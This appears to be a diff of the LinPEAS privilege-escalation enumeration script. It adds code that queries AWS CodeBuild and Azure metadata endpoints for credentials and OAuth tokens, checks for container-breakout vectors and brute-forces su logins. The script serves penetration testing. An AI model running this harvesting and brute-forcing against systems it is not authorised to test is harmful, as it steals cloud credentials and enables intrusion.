print_info "https://github.com/jondonas/linux-exploit-suggester-2"
|
||||
les2_b64="peass{LES2}"
|
||||
echo $les2_b64 | base64 -d | perl 2>/dev/null | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -i "CVE" -B 1 -A 10 | grep -Ev "^\-\-$" | sed -${E} "s,CVE-[0-9]+-[0-9]+,${SED_RED},g"
|
||||
echo ""
|
||||
fi
|
||||
|
||||
if [ "$MACPEAS" ] && [ "$(command -v brew 2>/dev/null)" ]; then
|
||||
print_2title "Brew Doctor Suggestions"
|
||||
brew doctor
|
||||
echo ""
|
||||
fi
|
||||
|
||||
|
||||
|
||||
#-- SY) AppArmor
|
||||
print_2title "Protections"
|
||||
print_list "AppArmor enabled? .............. "$NC
|
||||
if [ "$(command -v aa-status 2>/dev/null)" ]; then
|
||||
aa-status 2>&1 | sed "s,disabled,${SED_RED},"
|
||||
elif [ "$(command -v apparmor_status 2>/dev/null)" ]; then
|
||||
apparmor_status 2>&1 | sed "s,disabled,${SED_RED},"
|
||||
elif [ "$(ls -d /etc/apparmor* 2>/dev/null)" ]; then
|
||||
ls -d /etc/apparmor*
|
||||
else
|
||||
echo_not_found "AppArmor"
|
||||
fi
|
||||
|
||||
#-- SY) LinuxONE
|
||||
print_list "is linuxONE? ................... "$NC
|
||||
( (uname -a | grep "s390x" >/dev/null 2>&1) && echo "Yes" || echo_not_found "s390x")
|
||||
|
||||
#-- SY) grsecurity
|
||||
print_list "grsecurity present? ............ "$NC
|
||||
( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity")
|
||||
|
||||
#-- SY) PaX
|
||||
print_list "PaX bins present? .............. "$NC
|
||||
(command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX")
|
||||
|
||||
#-- SY) Execshield
|
||||
print_list "Execshield enabled? ............ "$NC
|
||||
(grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED},"
|
||||
|
||||
#-- SY) SElinux
|
||||
print_list "SELinux enabled? ............... "$NC
|
||||
(sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED},"
|
||||
|
||||
#-- SY) Seccomp
|
||||
print_list "Seccomp enabled? ............... "$NC
|
||||
([ "$(grep Seccomp /proc/self/status 2>/dev/null | grep -v 0)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN},"
|
||||
|
||||
#-- SY) AppArmor
|
||||
print_list "AppArmor profile? .............. "$NC
|
||||
(cat /proc/self/attr/current 2>/dev/null || echo "unconfined") | sed "s,unconfined,${SED_RED}," | sed "s,kernel,${SED_GREEN},"
|
||||
|
||||
#-- SY) AppArmor
|
||||
print_list "User namespace? ................ "$NC
|
||||
if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then echo "enabled" | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed "s,disabled,${SED_RED},"; fi
|
||||
|
||||
#-- SY) cgroup2
|
||||
print_list "Cgroup2 enabled? ............... "$NC
|
||||
([ "$(grep cgroup2 /proc/filesystems 2>/dev/null)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN},"
|
||||
|
||||
#-- SY) Gatekeeper
|
||||
if [ "$MACPEAS" ]; then
|
||||
print_list "Gatekeeper enabled? .......... "$NC
|
||||
(spctl --status 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED},"
|
||||
|
||||
print_list "sleepimage encrypted? ........ "$NC
|
||||
(sysctl vm.swapusage | grep "encrypted" | sed "s,encrypted,${SED_GREEN},") || echo_no
|
||||
|
||||
print_list "XProtect? .................... "$NC
|
||||
(system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5 | grep -Iv "^$") || echo_no
|
||||
|
||||
print_list "SIP enabled? ................. "$NC
|
||||
csrutil status | sed "s,enabled,${SED_GREEN}," | sed "s,disabled,${SED_RED}," || echo_no
|
||||
|
||||
print_list "Connected to JAMF? ........... "$NC
|
||||
warn_exec jamf checkJSSConnection
|
||||
|
||||
print_list "Connected to AD? ............. "$NC
|
||||
dsconfigad -show && echo "" || echo_no
|
||||
fi
|
||||
|
||||
#-- SY) ASLR
|
||||
print_list "Is ASLR enabled? ............... "$NC
|
||||
ASLR=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null)
|
||||
if [ -z "$ASLR" ]; then
|
||||
echo_not_found "/proc/sys/kernel/randomize_va_space";
|
||||
else
|
||||
if [ "$ASLR" -eq "0" ]; then printf $RED"No"$NC; else printf $GREEN"Yes"$NC; fi
|
||||
echo ""
|
||||
fi
|
||||
|
||||
#-- SY) Printer
|
||||
print_list "Printer? ....................... "$NC
|
||||
(lpstat -a || system_profiler SPPrintersDataType || echo_no) 2>/dev/null
|
||||
|
||||
#-- SY) Running in a virtual environment
|
||||
print_list "Is this a virtual machine? ..... "$NC
|
||||
hypervisorflag=$(grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor)
|
||||
if [ "$(command -v systemd-detect-virt 2>/dev/null)" ]; then
|
||||
detectedvirt=$(systemd-detect-virt)
|
||||
if [ "$hypervisorflag" ]; then printf $RED"Yes ($detectedvirt)"$NC; else printf $GREEN"No"$NC; fi
|
||||
else
|
||||
if [ "$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi
|
||||
fi
|
||||
|
||||
@@ -149,6 +149,16 @@ checkCreateReleaseAgent(){
|
||||
}
|
||||
|
||||
checkProcSysBreakouts(){
|
||||
dev_mounted="No"
|
||||
if [ $(ls -l /dev | grep -E "^c" | wc -l) -gt 50 ]; then
|
||||
dev_mounted="Yes";
|
||||
fi
|
||||
|
||||
proc_mounted="No"
|
||||
if [ $(ls /proc | grep -E "^[0-9]" | wc -l) -gt 50 ]; then
|
||||
proc_mounted="Yes";
|
||||
fi
|
||||
|
||||
run_unshare=$(unshare -UrmC bash -c 'echo -n Yes' 2>/dev/null)
|
||||
if ! [ "$run_unshare" = "Yes" ]; then
|
||||
run_unshare="No"
|
||||
@@ -208,7 +218,7 @@ checkProcSysBreakouts(){
|
||||
##############################################
|
||||
containerCheck
|
||||
|
||||
print_2title "Container related tools present"
|
||||
print_2title "Container related tools present (if any):"
|
||||
command -v docker
|
||||
command -v lxc
|
||||
command -v rkt
|
||||
@@ -216,8 +226,10 @@ command -v kubectl
|
||||
command -v podman
|
||||
command -v runc
|
||||
|
||||
print_2title "Am I Containered?"
|
||||
execBin "AmIContainered" "https://github.com/genuinetools/amicontained" "$FAT_LINPEAS_AMICONTAINED"
|
||||
if [ "$$FAT_LINPEAS_AMICONTAINED" ]; then
|
||||
print_2title "Am I Containered?"
|
||||
execBin "AmIContainered" "https://github.com/genuinetools/amicontained" "$FAT_LINPEAS_AMICONTAINED"
|
||||
fi
|
||||
|
||||
print_2title "Container details"
|
||||
print_list "Is this a container? ...........$NC $containerType"
|
||||
@@ -250,7 +262,7 @@ if echo "$containerType" | grep -qi "docker"; then
|
||||
print_2title "Docker Container details"
|
||||
inDockerGroup
|
||||
print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
|
||||
print_list "Looking and enumerating Docker Sockets\n"$NC
|
||||
print_list "Looking and enumerating Docker Sockets (if any):\n"$NC
|
||||
enumerateDockerSockets
|
||||
print_list "Docker version .................$NC$dockerVersion"
|
||||
checkDockerVersionExploits
|
||||
@@ -258,7 +270,7 @@ if echo "$containerType" | grep -qi "docker"; then
|
||||
print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW},"
|
||||
if [ "$inContainer" ]; then
|
||||
checkDockerRootless
|
||||
print_list "Rootless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN},"
|
||||
print_list "Rootless Docker? ............... $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN},"
|
||||
echo ""
|
||||
fi
|
||||
if df -h | grep docker; then
|
||||
@@ -310,34 +322,35 @@ if [ "$inContainer" ]; then
|
||||
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/sensitive-mounts"
|
||||
|
||||
checkProcSysBreakouts
|
||||
print_list "/proc mounted? ................. $proc_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
|
||||
print_list "/dev mounted? .................. $dev_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
|
||||
print_list "Run ushare ..................... $run_unshare\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "release_agent breakout 1........ $release_agent_breakout1\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "release_agent breakout 2........ $release_agent_breakout2\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
|
||||
print_list "core_pattern breakout .......... $core_pattern_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
|
||||
print_list "binfmt_misc breakout ........... $binfmt_misc_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
|
||||
print_list "uevent_helper breakout ......... $uevent_helper_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
|
||||
print_list "core_pattern breakout .......... $core_pattern_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW},"
|
||||
print_list "is modprobe present ............ $modprobe_present\n" | sed -${E} "s,/.*,${SED_RED},"
|
||||
print_list "DoS via panic_on_oom ........... $panic_on_oom_dos\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "DoS via panic_sys_fs ........... $panic_sys_fs_dos\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "DoS via sysreq_trigger_dos ..... $sysreq_trigger_dos\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/proc/config.gz readable ....... $proc_configgz_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/proc/sched_debug readable ..... $sched_debug_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/proc/*/mountinfo readable ..... $mountinfo_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/sys/kernel/security present ... $security_present\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/sys/kernel/security writable .. $security_writable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "DoS via panic_on_oom ........... $panic_on_oom_dos\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "DoS via panic_sys_fs ........... $panic_sys_fs_dos\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "DoS via sysreq_trigger_dos ..... $sysreq_trigger_dos\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "/proc/config.gz readable ....... $proc_configgz_readable\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "/proc/sched_debug readable ..... $sched_debug_readable\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "/proc/*/mountinfo readable ..... $mountinfo_readable\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "/sys/kernel/security present ... $security_present\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "/sys/kernel/security writable .. $security_writable\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
if [ "$EXTRA_CHECKS" ]; then
|
||||
print_list "/proc/kmsg readable ............ $kmsg_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/proc/kallsyms readable ........ $kallsyms_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/proc/self/mem readable ........ $sched_debug_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/proc/kcore readable ........... $kcore_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/proc/kmem readable ............ $kmem_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/proc/kmem writable ............ $kmem_writable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/proc/mem readable ............. $mem_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/proc/mem writable ............. $mem_writable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/sys/kernel/vmcoreinfo readable $vmcoreinfo_readable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/sys/firmware/efi/vars writable $efi_vars_writable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/sys/firmware/efi/efivars writable $efi_efivars_writable\n" | sed -${E} "s,/Yes,${SED_RED},"
|
||||
print_list "/proc/kmsg readable ............ $kmsg_readable\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "/proc/kallsyms readable ........ $kallsyms_readable\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "/proc/self/mem readable ........ $sched_debug_readable\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "/proc/kcore readable ........... $kcore_readable\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "/proc/kmem readable ............ $kmem_readable\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "/proc/kmem writable ............ $kmem_writable\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "/proc/mem readable ............. $mem_readable\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "/proc/mem writable ............. $mem_writable\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "/sys/kernel/vmcoreinfo readable $vmcoreinfo_readable\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "/sys/firmware/efi/vars writable $efi_vars_writable\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
print_list "/sys/firmware/efi/efivars writable $efi_efivars_writable\n" | sed -${E} "s,Yes,${SED_RED},"
|
||||
fi
|
||||
|
||||
echo ""
|
||||
@@ -377,7 +390,8 @@ if [ "$inContainer" ]; then
|
||||
if [ "$(command -v capsh)" ]; then
|
||||
capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g"
|
||||
else
|
||||
cat /proc/self/status | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s,0000000000000000|00000000a80425fb,${SED_GREEN},g"
|
||||
defautl_docker_caps="00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap"
|
||||
cat /proc/self/status | tr '\t' ' ' | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s/00000000a80425fb/$defautl_docker_caps/g" | sed -${E} "s,0000000000000000|00000000a80425fb,${SED_GREEN},g"
|
||||
echo $ITALIC"Run capsh --decode=<hex> to decode the capabilities"$NC
|
||||
fi
|
||||
echo ""
|
||||
|
||||
@@ -90,6 +90,33 @@ check_aws_lambda(){
|
||||
fi
|
||||
}
|
||||
|
||||
check_aws_codebuild(){
|
||||
is_aws_codebuild="No"
|
||||
|
||||
if [ -f "/codebuild/output/tmp/env.sh" ] && grep -q "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" "/codebuild/output/tmp/env.sh" ; then
|
||||
is_aws_codebuild="Yes"
|
||||
fi
|
||||
}
|
||||
|
||||
check_az_vm(){
|
||||
is_az_vm="No"
|
||||
|
||||
if [ -d "/var/log/azure/" ]; then
|
||||
is_az_vm="Yes"
|
||||
|
||||
elif cat /etc/resolv.conf 2>/dev/null | grep -q "search reddog.microsoft.com"; then
|
||||
is_az_vm="Yes"
|
||||
fi
|
||||
}
|
||||
|
||||
check_az_app(){
|
||||
is_az_app="No"
|
||||
|
||||
if [ -d "/opt/microsoft" ] && env | grep -q "IDENTITY_ENDPOINT"; then
|
||||
is_az_app="Yes"
|
||||
fi
|
||||
}
|
||||
|
||||
|
||||
check_gcp
|
||||
print_list "Google Cloud Platform? ............... $is_gcp\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
|
||||
@@ -100,10 +127,16 @@ print_list "AWS EC2? ............................. $is_aws_ec2\n"$NC | sed "s,Ye
|
||||
print_list "AWS EC2 Beanstalk? ................... $is_aws_ec2_beanstalk\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
|
||||
check_aws_lambda
|
||||
print_list "AWS Lambda? .......................... $is_aws_lambda\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
|
||||
check_aws_codebuild
|
||||
print_list "AWS Codebuild? ....................... $is_aws_codebuild\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
|
||||
check_do
|
||||
print_list "DO Droplet? .......................... $is_do\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
|
||||
check_ibm_vm
|
||||
print_list "IBM Cloud VM? ........................ $is_ibm_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
|
||||
check_az_vm
|
||||
print_list "Azure VM? ............................ $is_az_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
|
||||
check_az_app
|
||||
print_list "Azure APP? ........................... $is_az_app\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
|
||||
|
||||
echo ""
|
||||
|
||||
@@ -313,6 +346,31 @@ if [ "$is_aws_lambda" = "Yes" ]; then
|
||||
printf "Event data: "; (curl -s "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next" 2>/dev/null || wget -q -O - "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next")
|
||||
fi
|
||||
|
||||
if [ "$is_aws_codebuild" = "Yes" ]; then
|
||||
print_2title "AWS Codebuild Enumeration"
|
||||
|
||||
aws_req=""
|
||||
if [ "$(command -v curl)" ]; then
|
||||
aws_req="curl -s -f"
|
||||
elif [ "$(command -v wget)" ]; then
|
||||
aws_req="wget -q -O -"
|
||||
else
|
||||
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
|
||||
echo "The addresses are in /codebuild/output/tmp/env.sh"
|
||||
fi
|
||||
|
||||
if [ "$aws_req" ]; then
|
||||
print_3title "Credentials"
|
||||
CREDS_PATH=$(cat /codebuild/output/tmp/env.sh | grep "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" | cut -d "'" -f 2)
|
||||
URL_CREDS="http://169.254.170.2$CREDS_PATH" # Already has a / at the begginig
|
||||
exec_with_jq eval $aws_req "$URL_CREDS"; echo ""
|
||||
|
||||
print_3title "Container Info"
|
||||
METADATA_URL=$(cat /codebuild/output/tmp/env.sh | grep "ECS_CONTAINER_METADATA_URI" | cut -d "'" -f 2)
|
||||
exec_with_jq eval $aws_req "$METADATA_URL"; echo ""
|
||||
fi
|
||||
fi
|
||||
|
||||
if [ "$is_do" = "Yes" ]; then
|
||||
print_2title "DO Droplet Enumeration"
|
||||
|
||||
@@ -360,6 +418,7 @@ if [ "$is_ibm_vm" = "Yes" ]; then
|
||||
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
|
||||
fi
|
||||
|
||||
if [ "$ibm_req" ]; then
|
||||
print_3title "Instance Details"
|
||||
exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance?version=2022-03-01"
|
||||
|
||||
@@ -373,5 +432,73 @@ if [ "$is_ibm_vm" = "Yes" ]; then
|
||||
print_3title "IAM credentials"
|
||||
exec_with_jq eval $ibm_req -X POST "http://169.254.169.254/instance_identity/v1/iam_token?version=2022-03-01"
|
||||
fi
|
||||
fi
|
||||
|
||||
fi
|
||||
|
||||
if [ "$is_az_vm" = "Yes" ]; then
|
||||
print_2title "Azure VM Enumeration"
|
||||
|
||||
HEADER="Metadata:true"
|
||||
URL="http://169.254.169.254/metadata"
|
||||
API_VERSION="2021-12-13" #https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#supported-api-versions
|
||||
|
||||
az_req=""
|
||||
if [ "$(command -v curl)" ]; then
|
||||
az_req="curl -s -f -H '$HEADER'"
|
||||
elif [ "$(command -v wget)" ]; then
|
||||
az_req="wget -q -O - -H '$HEADER'"
|
||||
else
|
||||
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
|
||||
fi
|
||||
|
||||
if [ "$az_req" ]; then
|
||||
print_3title "Instance details"
|
||||
exec_with_jq eval $az_req "$URL/instance?api-version=$API_VERSION"
|
||||
|
||||
print_3title "Load Balancer details"
|
||||
exec_with_jq eval $az_req "$URL/loadbalancer?api-version=$API_VERSION"
|
||||
|
||||
print_3title "Management token"
|
||||
exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://management.azure.com/"
|
||||
|
||||
print_3title "Graph token"
|
||||
exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://graph.microsoft.com/"
|
||||
|
||||
print_3title "Vault token"
|
||||
exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://vault.azure.net/"
|
||||
|
||||
print_3title "Storage token"
|
||||
exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://storage.azure.com/"
|
||||
fi
|
||||
fi
|
||||
|
||||
if [ "$check_az_app" = "Yes" ]; then
|
||||
print_2title "Azure App Service Enumeration"
|
||||
echo "I haven't tested this one, if it doesn't work, please send a PR fixing and adding functionality :)"
|
||||
|
||||
HEADER="secret:$IDENTITY_HEADER"
|
||||
|
||||
az_req=""
|
||||
if [ "$(command -v curl)" ]; then
|
||||
az_req="curl -s -f -H '$HEADER'"
|
||||
elif [ "$(command -v wget)" ]; then
|
||||
az_req="wget -q -O - -H '$HEADER'"
|
||||
else
|
||||
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
|
||||
fi
|
||||
|
||||
if [ "$az_req" ]; then
|
||||
print_3title "Management token"
|
||||
exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://management.azure.com/"
|
||||
|
||||
print_3title "Graph token"
|
||||
exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://graph.microsoft.com/"
|
||||
|
||||
print_3title "Vault token"
|
||||
exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://vault.azure.net/"
|
||||
|
||||
print_3title "Storage token"
|
||||
exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://storage.azure.com/"
|
||||
fi
|
||||
fi
|
||||
|
||||
@@ -95,9 +95,9 @@ if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then
|
||||
echo "Current user has .sudo_as_admin_successful file, so he can execute with sudo" | sed -${E} "s,.*,${SED_RED},";
|
||||
fi
|
||||
|
||||
if ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep -qE '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$'; then
|
||||
echo "Current user has other interactive shells running" | sed -${E} "s,.*,${SED_RED},g";
|
||||
ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep -E '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$'
|
||||
if ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep -v " " | grep -qE '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$'; then
|
||||
echo "Current user has other interactive shells running: " | sed -${E} "s,.*,${SED_RED},g";
|
||||
ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep -v " " | grep -E '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$'
|
||||
fi
|
||||
|
||||
else
|
||||
@@ -214,8 +214,7 @@ if [ "$EXTRA_CHECKS" ]; then
|
||||
fi
|
||||
|
||||
#-- UI) Brute su
|
||||
EXISTS_SUDO="$(command -v sudo 2>/dev/null)"
|
||||
if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] && [ "$EXISTS_SUDO" ]; then
|
||||
if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ]; then
|
||||
print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC
|
||||
POSSIBE_SU_BRUTE=$(check_if_su_brute);
|
||||
if [ "$POSSIBE_SU_BRUTE" ]; then
|
||||
@@ -228,6 +227,6 @@ if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] &&
|
||||
printf $GREEN"It's not possible to brute-force su.\n\n"$NC
|
||||
fi
|
||||
else
|
||||
print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC
|
||||
print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)\n"$NC
|
||||
fi
|
||||
print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC
|
||||
|
||||
@@ -326,7 +326,7 @@ peass{NFS Exports}
|
||||
kadmin_exists="$(command -v kadmin)"
|
||||
klist_exists="$(command -v klist)"
|
||||
kinit_exists="$(command -v kinit)"
|
||||
if [ "$kadmin_exists" ] || [ "$klist_exists" ] || [ "$kinit_exists" ] || [ "$PSTORAGE_KERBEROS" ] || [ "$DEBUG" ]; then
|
||||
if [ "$kadmin_exists" ] || [ "$klist_exists" ] || [ "$kinit_exists" ] || [ "$PSTORAGE_KERBEROS" ] || [ "$DEBUG" ]; then
|
||||
print_2title "Searching kerberos conf files and tickets"
|
||||
print_info "http://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-active-directory"
|
||||
|
||||
|
||||
@@ -177,7 +177,7 @@ echo ""
|
||||
##-- IPF) Misconfigured ld.so
|
||||
if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$IAMROOT" ]; then
|
||||
print_2title "Checking misconfigurations of ld.so"
|
||||
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so"
|
||||
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld.so"
|
||||
if [ -f "/etc/ld.so.conf" ] && [ -w "/etc/ld.so.conf" ]; then
|
||||
echo "You have write privileges over /etc/ld.so.conf" | sed -${E} "s,.*,${SED_RED_YELLOW},";
|
||||
printf $RED$ITALIC"/etc/ld.so.conf\n"$NC;
|
||||
|
||||
@@ -74,6 +74,7 @@ THREADS="$( ( (grep -c processor /proc/cpuinfo 2>/dev/null) || ( (command -v lsc
|
||||
HELP=$GREEN"Enumerate and search Privilege Escalation vectors.
|
||||
${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, processes and file permissions, special file permissions, readable/writable files, bruteforce other users(top1000pwds), passwords...)$NC inside the host and highlight possible misconfigurations with colors.
|
||||
${GREEN} Checks:
|
||||
${YELLOW} -a${BLUE} Perform all checks: 1 min of processes, su brute, and extra checks.
|
||||
${YELLOW} -o${BLUE} Only execute selected checks (peass{CHECKS}). Select a comma separated list.
|
||||
${YELLOW} -s${BLUE} Stealth & faster (don't check some time consuming checks)
|
||||
${YELLOW} -e${BLUE} Perform extra enumeration
|
||||
@@ -246,7 +247,7 @@ print_support () {
|
||||
| ${BLUE}Do you like PEASS?${GREEN} |
|
||||
|---------------------------------------------------------------------------------|
|
||||
| ${YELLOW}Get the latest version${GREEN} : ${RED}https://github.com/sponsors/carlospolop${GREEN} |
|
||||
| ${YELLOW}Follow on Twitter${GREEN} : ${RED}@carlospolopm${GREEN} |
|
||||
| ${YELLOW}Follow on Twitter${GREEN} : ${RED}@hacktricks_live${GREEN} |
|
||||
| ${YELLOW}Respect on HTB${GREEN} : ${RED}SirBroccoli ${GREEN} |
|
||||
|---------------------------------------------------------------------------------|
|
||||
| ${BLUE}Thank you! ${GREEN} |
|
||||
@@ -527,7 +528,7 @@ STRINGS="$(command -v strings 2>/dev/null)"
|
||||
LDD="$(command -v ldd 2>/dev/null)"
|
||||
READELF="$(command -v readelf 2>/dev/null)"
|
||||
|
||||
shscripsG="/0trace.sh|/alsa-info.sh|amuFormat.sh|/blueranger.sh|/crosh.sh|/dnsmap-bulk.sh|/dockerd-rootless.sh|/dockerd-rootless-setuptool.sh|/get_bluetooth_device_class.sh|/gettext.sh|/go-rhn.sh|/gvmap.sh|/kernel_log_collector.sh|/lesspipe.sh|/lprsetup.sh|/mksmbpasswd.sh|/pm-utils-bugreport-info.sh|/power_report.sh|/setuporamysql.sh|/setup-nsssysinit.sh|/readlink_f.sh|/rescan-scsi-bus.sh|/start_bluetoothd.sh|/start_bluetoothlog.sh|/testacg.sh|/testlahf.sh|/unix-lpr.sh|/url_handler.sh|/write_gpt.sh"
|
||||
